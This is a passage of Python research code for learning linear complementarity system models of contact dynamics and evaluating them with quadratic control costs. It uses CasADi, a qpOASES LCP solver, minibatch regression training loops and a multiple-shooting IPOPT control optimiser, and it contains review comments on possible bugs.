            self.lcp_theta += [vec(self.G)]
        else:
            self.G = DM(G)
        if H is None:
            self.H = SX.sym('H', self.n_lam, self.n_lam)
            self.theta += [vec(self.H)]
            self.lcp_theta += [vec(self.H)]
        else:
            self.H = DM(H)
        if lcp_offset is None:
            self.lcp_offset = SX.sym('lcp_offset', self.n_lam)
            self.theta += [vec(self.lcp_offset)]
            self.lcp_theta += [vec(self.lcp_offset)]
        else:
            self.lcp_offset = DM(lcp_offset)
        # collapse the parameter lists into single column vectors
        self.theta = vcat(self.theta)
        self.lcp_theta = vcat(self.lcp_theta)
        self.dyn_theta = vcat(self.dyn_theta)
        self.n_theta = self.theta.numel()
        self.n_lcp_theta = self.lcp_theta.numel()
        self.n_dyn_theta = self.dyn_theta.numel()
        # F is built from G and H so its symmetric part stays PSD (plus stiffness*I)
        self.F = stiffness * np.eye(self.n_lam) + self.G @ self.G.T + self.H - self.H.T
        self.F_fn = Function('F_fn', [self.lcp_theta], [self.F])
        self.D_fn = Function('D_fn', [self.lcp_theta], [self.D])
        self.E_fn = Function('E_fn', [self.lcp_theta], [self.E])
        self.G_fn = Function('G_fn', [self.lcp_theta], [self.G])
        self.H_fn = Function('H_fn', [self.lcp_theta], [self.H])
        self.A_fn = Function('A_fn', [self.dyn_theta], [self.A])
        self.B_fn = Function('B_fn', [self.dyn_theta], [self.B])
        self.C_fn = Function('C_fn', [self.dyn_theta], [self.C])
        self.lcp_offset_fn = Function('lcp_offset_fn', [self.lcp_theta], [self.lcp_offset])

    # NOTE: method name keeps the original spelling ("differetiable") because
    # external callers use it; renaming would break the API.
    def differetiable(self):
        """Build the LCP solver and the gradient functions used for learning."""
        # lcp loss: the complementarity gap dot(dist, lam), minimized s.t.
        # lam >= 0 and dist >= 0 (a QP in lam, parameterized by x, u, lcp_theta)
        self.dist = self.D @ self.x + self.E @ self.u + self.F @ self.lam + self.lcp_offset
        lcp_data_theta = vertcat(self.x, self.u, self.lcp_theta)
        self.lcp_loss = dot(self.dist, self.lam)
        quadprog = {'x': self.lam, 'f': self.lcp_loss, 'g': self.dist, 'p': lcp_data_theta}
        opts = {'printLevel': 'none', }
        self.lcp_Solver = qpsol('lcp_Solver', 'qpoases', quadprog, opts)
        # define the dynamics loss
        self.x_next = SX.sym('x_next', self.n_state)
        data = vertcat(self.x, self.u, self.x_next)
        self.dyn = self.A @ self.x + self.B @ self.u + self.C @ self.lam
        self.dyn_loss = dot(self.dyn - self.x_next, self.dyn - self.x_next)
        self.dyn_fn = Function('dyn_fn', [self.x, self.u, self.lam, self.dyn_theta], [self.dyn])
        # define the dynamics loss with respect to the lam variable
        self.dloss_dlam = jacobian(self.dyn_loss, self.lam)
        # define the gradient of lam with respect to lcp_theta via the
        # implicit-function theorem on the complementarity residual g = 0
        g = diag(self.lam) @ self.dist
        dg_dlam = jacobian(g, self.lam)
        dg_dlcp = jacobian(g, self.lcp_theta)
        self.dlam_dlcp = -inv(dg_dlam) @ dg_dlcp
        self.dloss_dlcp = (self.dloss_dlam @ self.dlam_dlcp).T
        # assemble functions
        data = vertcat(self.x, self.u, self.x_next)
        self.dloss_dlcp_fn = Function('dloss_dlcp_fn', [data, self.lam, self.dyn_theta, self.lcp_theta],
                                      [self.dloss_dlcp])

    def compute_lambda(self, x_batch, u_batch, lcp_theta):
        """Solve the batched LCP at the given lcp_theta value.

        Returns (lam_opt_batch, lcp_loss_opt_batch), one row / entry per
        (x, u) data point.
        """
        self.differetiable()
        # prepare the data
        batch_size = x_batch.shape[0]
        lcp_data_batch = np.hstack((x_batch, u_batch))
        lcp_theta_batch = np.tile(lcp_theta, (batch_size, 1))
        lcp_data_theta_batch = np.hstack((lcp_data_batch, lcp_theta_batch))
        # compute the lam solution
        sol_batch = self.lcp_Solver(lbx=0.0, lbg=0.0, p=lcp_data_theta_batch.T)
        lcp_loss_opt_batch = sol_batch['f'].full().flatten()
        lam_opt_batch = sol_batch['x'].full().T
        return lam_opt_batch, lcp_loss_opt_batch

    def dyn_regression(self, x_batch, u_batch, lam_opt_batch, x_next_batch):
        """Least-squares fit of dyn_theta; returns (theta_opt, mean loss).

        The Kronecker products lift the matrix regression
        x' = A x + B u + C lam into a vector regression in vec([A, B, C]),
        solved via the normal equations.
        """
        # prepare the data
        batch_size = x_batch.shape[0]
        I = np.eye(self.n_state)
        kron_x = np.kron(x_batch, I)
        kron_u = np.kron(u_batch, I)
        kron_lam_opt = np.kron(lam_opt_batch, I)
        kron_x_next = x_next_batch.flatten()
        mat_A = np.hstack((kron_x, kron_u, kron_lam_opt))
        vec_b = kron_x_next
        # do the regression for dyn_theta
        dyn_theta_opt = inv(mat_A.T @ mat_A) @ (mat_A.T @ vec_b)
        dyn_loss_opt = dot(mat_A @ dyn_theta_opt - vec_b, mat_A @ dyn_theta_opt - vec_b) / batch_size
        return dyn_theta_opt.full().flatten(), dyn_loss_opt

    def gradient_step(self, x_batch, u_batch, x_next_batch, lam_opt_batch, dyn_theta_opt, lcp_theta):
        """Batch-averaged gradient of the dynamics loss w.r.t. lcp_theta."""
        batch_size = x_batch.shape[0]
        data_batch = np.hstack((x_batch, u_batch, x_next_batch))
        dyn_theta_opt_batch = np.tile(dyn_theta_opt, (batch_size, 1))
        lcp_theta_batch = np.tile(lcp_theta, (batch_size, 1))
        # compute the gradient value
        dlcp = self.dloss_dlcp_fn(data_batch.T, lam_opt_batch.T, dyn_theta_opt_batch.T, lcp_theta_batch.T)
        dlcp_mean = dlcp.full().mean(axis=1)
        return dlcp_mean.flatten()

    def dyn_prediction(self, x_batch, u_batch, dyn_theta_opt, lcp_theta):
        """Predict next states at the given parameter values.

        Returns (x_next_batch, lam_opt_batch).
        """
        self.differetiable()
        # prepare the data
        batch_size = x_batch.shape[0]
        lcp_data_batch = np.hstack((x_batch, u_batch))
        lcp_theta_batch = np.tile(lcp_theta, (batch_size, 1))
        lcp_data_theta_batch = np.hstack((lcp_data_batch, lcp_theta_batch))
        # compute the lam solution
        sol_batch = self.lcp_Solver(lbx=0.0, lbg=0.0, p=lcp_data_theta_batch.T)
        lam_opt_batch = sol_batch['x'].full().T
        # compute the next state batch
        dyn_theta_op_batch = np.tile(dyn_theta_opt, (batch_size, 1))
        x_next_batch = self.dyn_fn(x_batch.T, u_batch.T, lam_opt_batch.T, dyn_theta_op_batch.T).full().T
        return x_next_batch, lam_opt_batch
# do statistics for the modes
def statiModes(lam_batch, tol=1e-5):
    """Tally the contact modes present in a batch of lambda solutions.

    Each lambda row is binarized (entry < tol -> inactive 0, otherwise
    active 1), and the distinct binary patterns are counted.

    Args:
        lam_batch: (batch, n_lam) array of complementarity solutions.
        tol: threshold below which a lambda entry counts as inactive.

    Returns:
        (unique_mode_list, mode_frequency_list): the distinct binary mode
        rows and, for each mode, the fraction of the batch it covers.
    """
    # binarize: active (>= tol) -> 1, inactive -> 0
    # (the unused n_lam / total-mode-count bookkeeping of the original
    # implementation has been dropped; it never affected the result)
    lam_batch_mode = np.where(lam_batch < tol, 0, 1)
    unique_mode_list, mode_count_list = np.unique(lam_batch_mode, axis=0, return_counts=True)
    mode_frequency_list = mode_count_list / lam_batch.shape[0]
    return unique_mode_list, mode_frequency_list
# do the plot of different modes
def plotModes(lam_batch, tol=1e-5):
    """Binarize a batch of lambda solutions and index each row by its mode.

    Returns (unique_mode_list, mode_indices): the distinct binary mode
    patterns, and for every row of lam_batch the index of the pattern it
    belongs to (suitable for color-coding a plot).
    """
    # entries below tol count as inactive contacts
    binarized = np.where(lam_batch < tol, 0, 1)
    modes, row_to_mode = np.unique(binarized, axis=0, return_inverse=True)
    return modes, row_to_mode
# generate the random control sequence
def randomControlTraj(traj_count, horizon, n_control):
    """Sample a batch of random control trajectories.

    Args:
        traj_count: number of trajectories to generate.
        horizon: number of time steps per trajectory.
        n_control: control dimension.

    Returns:
        A list of traj_count arrays, each of shape (horizon, n_control),
        with entries drawn i.i.d. from the standard normal distribution.
    """
    # comprehension instead of a manual accumulation loop
    return [np.random.randn(horizon, n_control) for _ in range(traj_count)]
# learn a lcs model from the sampled data using regression algorithms
def LCSRegressionBuffer(lcs_learner, optimizier,
                        curr_control_traj_batch, curr_true_state_traj_batch,
                        prev_control_traj_batch, prev_true_state_traj_batch,
                        buffer_ratio=0.5,
                        minibatch_size=200, max_iter=5000, print_level=0):
    """Train the LCS learner on current data mixed with a replay buffer.

    Each minibatch draws (1 - buffer_ratio) * minibatch_size transitions from
    the current trajectories and the remainder from the previous (buffer)
    trajectories. Per iteration: solve the LCP for lambda, regress the
    dynamics parameters in closed form, and take one gradient step on the
    LCP parameters via the optimizer.

    Args:
        lcs_learner: learner exposing compute_lambda / dyn_regression /
            gradient_step / dyn_prediction and a val_lcp_theta attribute.
        optimizier: object with a step(theta, gradient) method.
        curr_control_traj_batch / curr_true_state_traj_batch: current data;
            each state trajectory has one more row than its control trajectory.
        prev_control_traj_batch / prev_true_state_traj_batch: replay data
            (may be empty lists).
        buffer_ratio: fraction of each minibatch taken from the replay data.
        minibatch_size: transitions per iteration.
        max_iter: number of gradient iterations.
        print_level: nonzero enables periodic progress printing.
    """
    # converting the data form: split trajectories into (x, u, x_next) triples
    curr_batch_size = len(curr_control_traj_batch)
    curr_train_u_batch = []
    curr_train_x_batch = []
    curr_train_x_next_batch = []
    for i in range(curr_batch_size):
        curr_train_u_batch += [curr_control_traj_batch[i]]
        curr_train_x_batch += [curr_true_state_traj_batch[i][0:-1]]
        curr_train_x_next_batch += [curr_true_state_traj_batch[i][1:]]
    curr_train_u_batch = np.vstack(curr_train_u_batch)
    curr_train_x_next_batch = np.vstack(curr_train_x_next_batch)
    curr_train_x_batch = np.vstack(curr_train_x_batch)
    curr_train_data_size = curr_train_u_batch.shape[0]
    curr_minibatch_size = int((1 - buffer_ratio) * minibatch_size)
    # converting the data form for the replay buffer (if any)
    prev_batch_size = len(prev_control_traj_batch)
    # `!= 0` instead of `is not 0`: identity comparison with an int literal is
    # implementation-dependent and a SyntaxWarning in Python >= 3.8
    if prev_batch_size != 0:
        prev_train_u_batch = []
        prev_train_x_batch = []
        prev_train_x_next_batch = []
        for i in range(prev_batch_size):
            prev_train_u_batch += [prev_control_traj_batch[i]]
            prev_train_x_batch += [prev_true_state_traj_batch[i][0:-1]]
            prev_train_x_next_batch += [prev_true_state_traj_batch[i][1:]]
        prev_train_u_batch = np.vstack(prev_train_u_batch)
        prev_train_x_next_batch = np.vstack(prev_train_x_next_batch)
        prev_train_x_batch = np.vstack(prev_train_x_batch)
        prev_train_data_size = prev_train_u_batch.shape[0]
        prev_minibatch_size = minibatch_size - curr_minibatch_size
    else:
        # no replay data: the whole minibatch comes from the current data
        curr_minibatch_size = minibatch_size
        prev_minibatch_size = 0
    print('current_data points:', curr_minibatch_size, '| history data points:', prev_minibatch_size)
    for k in range(max_iter):
        # mini batch dataset for current training data set
        curr_shuffle_index = np.random.permutation(curr_train_data_size)[0:curr_minibatch_size]
        curr_x_minibatch = curr_train_x_batch[curr_shuffle_index]
        curr_u_minibatch = curr_train_u_batch[curr_shuffle_index]
        curr_x_next_minibatch = curr_train_x_next_batch[curr_shuffle_index]
        # mini batch dataset for the previous training data set
        if prev_batch_size != 0:
            prev_shuffle_index = np.random.permutation(prev_train_data_size)[0:prev_minibatch_size]
            prev_x_minibatch = prev_train_x_batch[prev_shuffle_index]
            prev_u_minibatch = prev_train_u_batch[prev_shuffle_index]
            prev_x_next_minibatch = prev_train_x_next_batch[prev_shuffle_index]
            x_minibatch = np.vstack((curr_x_minibatch, prev_x_minibatch))
            u_minibatch = np.vstack((curr_u_minibatch, prev_u_minibatch))
            x_next_minibatch = np.vstack((curr_x_next_minibatch, prev_x_next_minibatch))
        else:
            x_minibatch = curr_x_minibatch
            u_minibatch = curr_u_minibatch
            x_next_minibatch = curr_x_next_minibatch
        # compute the lambda batch
        lam_opt_mini_batch, loss_opt_mini_batch = lcs_learner.compute_lambda(x_minibatch, u_minibatch)
        # regression for the dynamics
        dyn_loss_opt = lcs_learner.dyn_regression(x_minibatch, u_minibatch, lam_opt_mini_batch, x_next_minibatch)
        # compute the gradient
        dlcp_theta = lcs_learner.gradient_step(x_minibatch, u_minibatch, x_next_minibatch, lam_opt_mini_batch)
        # store and update
        lcs_learner.val_lcp_theta = optimizier.step(lcs_learner.val_lcp_theta, dlcp_theta)
        if print_level != 0:
            if k % 100 == 0:
                # on the prediction using the current learned lcs
                pred_x_next_batch, pred_lam_batch = lcs_learner.dyn_prediction(curr_train_x_batch, curr_train_u_batch)
                # compute the prediction error
                error_x_next_batch = pred_x_next_batch - curr_train_x_next_batch
                relative_error = (
                        la.norm(error_x_next_batch, axis=1) / (
                        la.norm(curr_train_x_next_batch, axis=1) + 0.0001)).mean()
                print(
                    'lcs learning iter', k,
                    '| loss:', dyn_loss_opt,
                    '| grad:', norm_2(dlcp_theta),
                    '| PRE:', relative_error,
                )
# learn a lcs model from the sampled data using regression algorithms without previous
def LCSLearningRegression(lcs_learner, optimizier, control_traj_batch, true_state_traj_batch,
                          max_iter=5000, minibatch_size=100, print_level=0):
    """Train the LCS learner by alternating regression and gradient steps.

    Per iteration on a random minibatch: solve the LCP for lambda, regress
    the dynamics parameters in closed form, and take one optimizer step on
    the LCP parameters. Unlike LCSRegressionBuffer, no replay buffer is used.

    Args:
        lcs_learner: learner exposing compute_lambda / dyn_regression /
            gradient_step / dyn_prediction and a val_lcp_theta attribute.
        optimizier: object with a step(theta, gradient) method.
        control_traj_batch / true_state_traj_batch: trajectories; each state
            trajectory has one more row than its control trajectory.
        max_iter: number of gradient iterations.
        minibatch_size: transitions per iteration.
        print_level: nonzero enables periodic progress printing.
    """
    # converting the data form: split trajectories into (x, u, x_next) triples
    batch_size = len(control_traj_batch)
    train_u_batch = []
    train_x_batch = []
    train_x_next_batch = []
    for i in range(batch_size):
        train_u_batch += [control_traj_batch[i]]
        train_x_batch += [true_state_traj_batch[i][0:-1]]
        train_x_next_batch += [true_state_traj_batch[i][1:]]
    train_u_batch = np.vstack(train_u_batch)
    train_x_next_batch = np.vstack(train_x_next_batch)
    train_x_batch = np.vstack(train_x_batch)
    # do the learning iteration
    train_data_size = train_u_batch.shape[0]
    for k in range(max_iter):
        # mini batch dataset
        shuffle_index = np.random.permutation(train_data_size)[0:minibatch_size]
        x_minibatch = train_x_batch[shuffle_index]
        u_minibatch = train_u_batch[shuffle_index]
        x_next_minibatch = train_x_next_batch[shuffle_index]
        # compute the lambda batch
        lam_opt_mini_batch, loss_opt_mini_batch = lcs_learner.compute_lambda(x_minibatch, u_minibatch)
        # regression for the dynamics
        dyn_loss_opt = lcs_learner.dyn_regression(x_minibatch, u_minibatch, lam_opt_mini_batch, x_next_minibatch)
        # compute the gradient
        dlcp_theta = lcs_learner.gradient_step(x_minibatch, u_minibatch, x_next_minibatch, lam_opt_mini_batch)
        # store and update
        lcs_learner.val_lcp_theta = optimizier.step(lcs_learner.val_lcp_theta, dlcp_theta)
        # `!= 0` instead of `is not 0`: identity comparison with an int
        # literal is implementation-dependent (SyntaxWarning since 3.8)
        if print_level != 0:
            if k % 100 == 0:
                # on the prediction using the current learned lcs
                pred_x_next_batch, pred_lam_batch = lcs_learner.dyn_prediction(train_x_batch, train_u_batch)
                # compute the prediction error
                error_x_next_batch = pred_x_next_batch - train_x_next_batch
                relative_error = (
                        la.norm(error_x_next_batch, axis=1) / (la.norm(train_x_next_batch, axis=1) + 0.0001)).mean()
                print(
                    'lcs learning iter', k,
                    '| loss:', dyn_loss_opt,
                    '| grad:', norm_2(dlcp_theta),
                    '| PRE:', relative_error,
                )
# learn a lcs model from the sampled data using l4dc paper
def LCSLearning(lcs_learner, optimizer, control_traj_batch, true_state_traj_batch,
                max_iter=5000, minibatch_size=100):
    """Train the LCS learner with annealed-relaxation gradient steps.

    Each iteration rebuilds the learner's differentiable program with a
    decreasing relaxation parameter epsilon, solves for the relaxed
    lambda/phi variables on a random minibatch, and applies one first-order
    optimizer step to the full parameter vector. Progress is printed every
    100 iterations.
    """
    # flatten the trajectories into aligned (x, u, x_next) transition arrays;
    # each state trajectory has one extra row, hence the [0:-1] / [1:] split
    u_data = np.vstack([control_traj_batch[i] for i in range(len(control_traj_batch))])
    x_next_data = np.vstack([traj[1:] for traj in true_state_traj_batch])
    x_data = np.vstack([traj[0:-1] for traj in true_state_traj_batch])
    n_data = u_data.shape[0]
    # relaxation schedule: log-spaced from 1e3 down to 1e-2
    epsilon = np.logspace(3, -2, max_iter)
    for k in range(max_iter):
        # draw a random minibatch of transitions
        picks = np.random.permutation(n_data)[0:minibatch_size]
        x_mb = x_data[picks]
        u_mb = u_data[picks]
        x_next_mb = x_next_data[picks]
        # rebuild the differentiable program with the annealed epsilon
        lcs_learner.differetiable(gamma=1e-3, epsilon=epsilon[k])
        lam_phi_mb, loss_mb = lcs_learner.compute_lambda(x_mb, u_mb, x_next_mb)
        # first-order gradient of the combined loss (no Hessian)
        dtheta, loss, dyn_loss, lcp_loss, dtheta_hessian = \
            lcs_learner.gradient_step(x_mb, u_mb, x_next_mb, lam_phi_mb,
                                      second_order=False)
        # apply the optimizer update to the full parameter vector
        lcs_learner.val_theta = optimizer.step(lcs_learner.val_theta, dtheta)
        if k % 100 == 0:
            # evaluate the prediction quality on the full training set
            pred_x_next, pred_lam = lcs_learner.dyn_prediction(x_data, u_data)
            residual = pred_x_next - x_next_data
            relative_error = (
                    la.norm(residual, axis=1) / (la.norm(x_next_data, axis=1) + 0.0001)).mean()
            print(
                k,
                '| loss:', loss,
                '| dyn_loss:', dyn_loss,
                '| lcp_loss:', lcp_loss,
                '| grad:', norm_2(dtheta),
                '| PRE:', relative_error,
                '| epsilon:', epsilon[k],
            )
# compute the gradient of the control input using the recovery matrix (Jin. et al. IJRR)
# evaluation object to evaluate the learned lcs model using a control cost function
class LCS_evaluation:
    """Evaluate a learned LCS model under a quadratic control cost.

    Provides two control-improvement schemes: a recovery-matrix gradient
    (Evaluate/Update, following Jin et al., IJRR) and a multiple-shooting
    proximal NLP (initializeUpdater/EvaluateMS).
    """

    def __init__(self, lcs_learner):
        """Copy the system dimensions from the learner and create symbols."""
        self.name = 'lcs evaluation'
        # define the system variables
        self.n_state = lcs_learner.n_state
        self.n_control = lcs_learner.n_control
        self.n_lam = lcs_learner.n_lam
        # define the system variables
        self.x = SX.sym('x', self.n_state)
        self.u = SX.sym('u', self.n_control)
        self.lam = SX.sym('lam', self.n_lam)

    def setCostFunction(self, Q, R, QN, control_horizon):
        """Define the quadratic path/final cost x'Qx + u'Ru and x'QNx."""
        self.Q = DM(Q)
        self.R = DM(R)
        self.QN = DM(QN)
        self.control_horizon = control_horizon
        # define the control cost function
        self.path_cost = dot(self.x, self.Q @ self.x) + dot(self.u, self.R @ self.u)
        self.final_cost = dot(self.x, self.QN @ self.x)
        self.path_cost_fn = Function('path_cost_fn', [self.x, self.u], [self.path_cost])
        self.final_cost_fn = Function('final_cost_fn', [self.x], [self.final_cost])

    def computeCost(self, control_traj_batch, state_traj_batch):
        """Accumulated cost of each (control, state) trajectory pair."""
        cost_batch = []
        batch_size = len(control_traj_batch)
        for i in range(batch_size):
            u_traj = control_traj_batch[i]
            x_traj = state_traj_batch[i]
            cost = 0.0
            # running cost over the horizon, then the terminal cost
            for t in range(self.control_horizon):
                curr_x = x_traj[t]
                curr_u = u_traj[t]
                cost += self.path_cost_fn(curr_x, curr_u)
            cost += self.final_cost_fn(x_traj[-1])
            cost_batch += [cost]
        return cost_batch

    def differentiable(self):
        """Build symbolic LCS matrices and the dynamics/cost gradients."""
        self.A = SX.sym('A', self.n_state, self.n_state)
        self.B = SX.sym('B', self.n_state, self.n_control)
        self.C = SX.sym('C', self.n_state, self.n_lam)
        self.D = SX.sym('D', self.n_lam, self.n_state)
        self.E = SX.sym('E', self.n_lam, self.n_control)
        self.F = SX.sym('F', self.n_lam, self.n_lam)
        self.lcp_offset = SX.sym('lcp_offset', self.n_lam)
        self.lcs_theta = vertcat(vec(self.A), vec(self.B), vec(self.C),
                                 vec(self.D), vec(self.E), vec(self.F),
                                 vec(self.lcp_offset))
        # define the dynamics
        self.f = self.A @ self.x + self.B @ self.u + self.C @ self.lam
        # gradient of lam w.r.t. x and u via the implicit-function theorem
        # on the complementarity residual diag(lam) @ dist = 0
        self.dist = self.D @ self.x + self.E @ self.u + self.F @ self.lam + self.lcp_offset
        g = diag(self.lam) @ self.dist
        dg_dlam = jacobian(g, self.lam)
        dg_dx = jacobian(g, self.x)
        dg_du = jacobian(g, self.u)
        dlam_dx = -inv(dg_dlam) @ dg_dx
        dlam_du = -inv(dg_dlam) @ dg_du
        # total derivatives of the dynamics (direct plus through lam)
        df_dx = jacobian(self.f, self.x) + jacobian(self.f, self.lam) @ dlam_dx
        df_du = jacobian(self.f, self.u) + jacobian(self.f, self.lam) @ dlam_du
        self.dfdx_fn = Function('dfdx_fn', [self.x, self.u, self.lam, self.lcs_theta], [df_dx])
        # fixed: this Function was previously (mis)named 'dfdx_fn' as well
        self.dfdu_fn = Function('dfdu_fn', [self.x, self.u, self.lam, self.lcs_theta], [df_du])
        # compute the gradient of the cost function
        self.dcdx = jacobian(self.path_cost, self.x).T
        self.dcdu = jacobian(self.path_cost, self.u).T
        self.dhdx = jacobian(self.final_cost, self.x).T
        # establish the functions for the above gradient
        self.dcdx_fn = Function('dcdx_fn', [self.x, self.u], [self.dcdx])
        self.dcdu_fn = Function('dcdu_fn', [self.x, self.u], [self.dcdu])
        self.dhdx_fn = Function('dhdx_fn', [self.x], [self.dhdx])

    # I use the single shooting method to update the control sequence but it does not work
    def Evaluate(self, lcs_learner, init_state_batch, control_traj_batch, true_state_traj_batch):
        """Compute a recovery-matrix control update for each trajectory.

        Rolls out the learned model, accumulates the recovery matrices H1/H2
        along each predicted trajectory, and returns
        (control_update_traj_batch, model_cost_batch, true_sys_cost_batch).
        """
        lcs_theta = lcs_learner.computeLCSMats()
        # compute the state batch_trajectory
        pred_state_traj_batch, pred_lam_traj_batch = lcs_learner.sim_dyn(init_state_batch, control_traj_batch)
        # control_update trajectory
        control_update_traj_batch = []
        model_cost_batch = []
        true_sys_cost_batch = []
        batch_size = init_state_batch.shape[0]
        for i in range(batch_size):
            u_traj = control_traj_batch[i]
            pred_x_traj = pred_state_traj_batch[i]
            pred_lam_traj = pred_lam_traj_batch[i]
            true_x_traj = true_state_traj_batch[i]
            control_horizon = u_traj.shape[0]
            # compute the recover matrix (see Jin et al. IJRR for details)
            curr_x = pred_x_traj[0]
            curr_u = u_traj[0]
            curr_lam = pred_lam_traj[0]
            next_x = pred_x_traj[1]
            next_u = u_traj[1]
            next_lam = pred_lam_traj[1]
            curr_dfdu = self.dfdu_fn(curr_x, curr_u, curr_lam, lcs_theta)
            curr_dcdu = self.dcdu_fn(curr_x, curr_u)
            next_dfdx = self.dfdx_fn(next_x, next_u, next_lam, lcs_theta)
            next_dcdx = self.dcdx_fn(next_x, next_u)
            H1 = curr_dfdu.T @ next_dcdx + curr_dcdu
            H2 = curr_dfdu.T @ next_dfdx.T
            model_cost = self.path_cost_fn(curr_x, curr_u)
            true_sys_cost = self.path_cost_fn(true_x_traj[0], curr_u)
            for t in range(1, control_horizon - 1):
                curr_x = pred_x_traj[t]
                curr_u = u_traj[t]
                next_x = pred_x_traj[t + 1]
                next_u = u_traj[t + 1]
                # NOTE(review): curr_lam / next_lam are NOT refreshed inside
                # this loop, so the t=0/t=1 lambdas are reused for every step.
                # That looks like an oversight (pred_lam_traj[t] is available)
                # — confirm intent before changing; behavior kept as-is.
                curr_dfdu = self.dfdu_fn(curr_x, curr_u, curr_lam, lcs_theta)
                curr_dcdu = self.dcdu_fn(curr_x, curr_u)
                next_dfdx = self.dfdx_fn(next_x, next_u, next_lam, lcs_theta)
                next_dcdx = self.dcdx_fn(next_x, next_u)
                H1 = vertcat(H1 + H2 @ next_dcdx,
                             curr_dfdu.T @ next_dcdx + curr_dcdu)
                H2 = vertcat(H2 @ next_dfdx.T,
                             curr_dfdu.T @ next_dfdx.T)
                model_cost += self.path_cost_fn(curr_x, curr_u)
                true_sys_cost += self.path_cost_fn(true_x_traj[t], curr_u)
            # final step: close the recursion with the terminal-cost gradient
            curr_x = pred_x_traj[control_horizon - 1]
            curr_u = u_traj[control_horizon - 1]
            curr_dfdu = self.dfdu_fn(curr_x, curr_u, curr_lam, lcs_theta)
            curr_dcdu = self.dcdu_fn(curr_x, curr_u)
            next_x = pred_x_traj[control_horizon]
            next_dhdx = self.dhdx_fn(next_x)
            H1 = vertcat(H1 + H2 @ next_dhdx,
                         curr_dfdu.T @ next_dhdx + curr_dcdu).full().flatten()
            model_cost += self.path_cost_fn(curr_x, curr_u)
            true_sys_cost += self.path_cost_fn(true_x_traj[control_horizon - 1], curr_u)
            model_cost += self.final_cost_fn(next_x)
            true_sys_cost += self.final_cost_fn(true_x_traj[control_horizon])
            control_update_traj_batch += [H1.reshape((-1, self.n_control))]
            model_cost_batch += [model_cost]
            true_sys_cost_batch += [true_sys_cost]
        return control_update_traj_batch, model_cost_batch, true_sys_cost_batch

    def Update(self, control_traj_batch, control_update_batch, step_size=1e-4):
        """Gradient-descent step on each control trajectory."""
        batch_size = len(control_traj_batch)
        new_control_traj_batch = []
        for i in range(batch_size):
            control_traj = control_traj_batch[i]
            update_traj = control_update_batch[i]
            new_control_traj = control_traj - step_size * update_traj
            new_control_traj_batch += [new_control_traj]
        return new_control_traj_batch

    # Then I think about to update the control sequence using multiple-shooting (this can be further improved)
    def initializeUpdater(self, proximity_epsilon=1e-3):
        """Build the multiple-shooting proximal NLP over the LCS model.

        Decision variables are states, controls and complementarity variables
        per step; complementarity is enforced as constraints. The objective
        adds a proximal term ||u - u_ref||^2 / proximity_epsilon pulling the
        solution towards the reference controls passed in as parameters.
        """
        self.differentiable()
        # Start with an empty NLP
        w = []
        w0 = []
        lbw = []
        ubw = []
        J = 0
        g = []
        lbg = []
        ubg = []
        p = []
        # "Lift" initial conditions (the bounds pin X0 to the initial state)
        Xk = casadi.SX.sym('X0', self.n_state)
        w += [Xk]
        lbw += np.zeros(self.n_state).tolist()
        ubw += np.zeros(self.n_state).tolist()
        w0 += np.zeros(self.n_state).tolist()
        # formulate the NLP
        for k in range(self.control_horizon):
            # New NLP variable for the control
            Uk = casadi.SX.sym('U_' + str(k), self.n_control)
            w += [Uk]
            lbw += self.n_control * [-inf]
            ubw += self.n_control * [inf]
            w0 += self.n_control * [0.]
            # new NLP variable for the complementarity variable
            Lamk = casadi.SX.sym('lam' + str(k), self.n_lam)
            w += [Lamk]
            lbw += self.n_lam * [0.]
            ubw += self.n_lam * [inf]
            w0 += self.n_lam * [0.]
            # Add complementarity equation: dist >= 0 and dot(dist, lam) = 0
            g += [self.D @ Xk + self.E @ Uk + self.F @ Lamk + self.lcp_offset]
            lbg += self.n_lam * [0.]
            ubg += self.n_lam * [inf]
            g += [casadi.dot(self.D @ Xk + self.E @ Uk + self.F @ Lamk + self.lcp_offset, Lamk)]
            lbg += [0.]
            ubg += [0.]
            # Integrate till the end of the interval
            Xnext = self.A @ Xk + self.B @ Uk + self.C @ Lamk
            # compute the current cost (quadratic stage cost + proximal term)
            Uk_ref = SX.sym('Uk_ref' + str(k), self.n_control)
            p += [Uk_ref]
            Ck = dot(Xk, self.Q @ Xk) + dot(Uk, self.R @ Uk) + dot(Uk - Uk_ref, Uk - Uk_ref) / proximity_epsilon
            J = J + Ck
            # New NLP variable for state at end of interval
            Xk = casadi.SX.sym('X_' + str(k + 1), self.n_state)
            w += [Xk]
            lbw += self.n_state * [-inf]
            ubw += self.n_state * [inf]
            w0 += self.n_state * [0.]
            # Add constraint for the dynamics (shooting gap = 0)
            g += [Xnext - Xk]
            lbg += self.n_state * [0.]
            ubg += self.n_state * [0.]
        # Add the final cost
        J = J + dot(Xk, self.QN @ Xk)
        # Create an NLP solver and solve
        p += [self.lcs_theta]
        opts = {'ipopt.print_level': 0, 'ipopt.sb': 'yes', 'print_time': 0}
        prob = {'f': J, 'x': casadi.vertcat(*w), 'g': casadi.vertcat(*g), 'p': vertcat(*p)}
        self.oc_solver = casadi.nlpsol('solver', 'ipopt', prob, opts)
        self.lbw = DM(lbw)
        self.ubw = DM(ubw)
        self.lbg = DM(lbg)
        self.ubg = DM(ubg)
        self.w0 = DM(w0)
        # this is warming start for acceleration of ipopt solver
        self.warm_start = []

    def EvaluateMS(self, lcs_learner, init_state_batch, control_traj_batch):
        """Improve each control trajectory by solving the proximal NLP.

        Returns the list of updated control trajectories; the optimal
        decision vectors are cached to warm-start the next call.
        """
        # fixed: previously this tested hasattr(self, 'solver'), which never
        # exists (the attribute is 'oc_solver'), so the NLP was rebuilt and
        # the warm start wiped on every call
        if not hasattr(self, 'oc_solver'):
            self.initializeUpdater()
        lcs_theta = lcs_learner.computeLCSMats()
        # compute the state batch_trajectory
        pred_state_traj_batch, pred_lam_traj_batch = lcs_learner.sim_dyn(init_state_batch, control_traj_batch)
        # ===============================================
        # do the update of the control sequence
        batch_size = len(control_traj_batch)
        updated_control_traj_batch = []
        updated_pred_state_traj_batch = []
        updated_pred_lam_traj_batch = []
        # this is for warm start for the next iteration
        w_opt_batch = []
        for i in range(batch_size):
            u_traj = control_traj_batch[i]
            init_state = init_state_batch[i]
            # set up the oc solver: pin X0 to the initial state
            # NOTE(review): these assignments alias self.lbw/self.ubw, so the
            # stored bounds are mutated in place across calls — presumably
            # benign since the same slice is overwritten each time; confirm.
            lbw = self.lbw
            ubw = self.ubw
            lbw[0:self.n_state] = DM(init_state)
            ubw[0:self.n_state] = DM(init_state)
            oc_para = vertcat(u_traj.flatten(), lcs_theta)
            # warm start
            if not self.warm_start:
                init_w = self.w0
                init_w[0:self.n_state] = DM(init_state)
            else:
